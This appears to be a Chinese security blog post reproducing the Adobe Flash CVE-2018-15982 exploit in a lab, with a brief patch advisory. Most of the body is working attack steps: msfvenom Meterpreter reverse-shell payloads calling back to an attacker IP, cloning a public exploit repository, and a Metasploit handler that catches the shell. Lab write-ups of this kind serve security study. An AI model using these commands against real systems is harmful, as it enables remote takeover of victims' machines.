CVE-2018-15982 Adobe Flash Player 0day漏洞

释放双眼,带上耳机,听听看~!

0X01 漏洞介绍

20181129日,360高级威胁应对团队发现一起针对俄罗斯的APT攻击行动,通过一份俄文内容的医院员工问卷文档,携带最新的Flash 0day漏洞和具有自毁功能的专属木马程序,该漏洞(CVE-2018-15982)允许攻击者恶意制作的Flash对象在受害者的计算机上执行代码,从而获取对系统命令行的访问权限。

0x02 影响版本

Adobe Flash Player <= 31.0.0.153

Adobe Flash Player Installer<=31.0.0.108

0x03 漏洞复现

1.  实验环境

攻击机:kali linux    192.168.32.136

受害机:Windows7   192.168.32.135

服务器:Windows7   192.168.32.1

Flash版本:31.0.0.108

2.  Payload生成

  生成meterpreter反弹

    msfvenom -p windows/meterpreter/reverse_tcp           LHOST=192.168.32.136 LPORT=7777-f raw > 86.bin

msfvenom -p windows/x64/meterpreter/reverse_tcpLHOST=192.168.32.136 LPORT=7777 -f raw > 64.bin

3. Exp生成

下载CVE-2018-15982 EXP 64.bin/86.bin所在目录

gitclone https://github.com/Ridter/CVE-2018-15982_EXP

进入到CVE-2018-15982_EXP目录将exp复制到家目录

生产EXP :python CVE_2018_15982.py -i 86.bin -I 64.bin

4.  Exp移动到服务器目录

5.  开始监听

启动msfconsole

service postgresql  restart

msfdb start

msfconsole

msf > use exploit/multi/handler

Msf exploit(handler) > set payloadwindows/meterpreter/reverse_tcp

msf exploit(handler) > show options

msf exploit(handler) > set LHOST192.168.32.136

msf exploit(handler) > set LPORT 7777

msf exploit(handler) > exploit

6. 受害者访问

Kali 端成功反弹shell

0x04 修复方案

Adobe官方已经发布新版本修复了上述漏洞,用户请及时升级进行防护。

下载地址:https://get.adobe.com/flashplayer

本文源自微信公众号:弥天安全实验室

人已赞赏
安全工具

Mimikatz的多种攻击方式以及防御方式

2019-10-18 16:54:38

安全工具

Vulnhub-MinUV1-writeup

2019-10-18 16:54:53

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索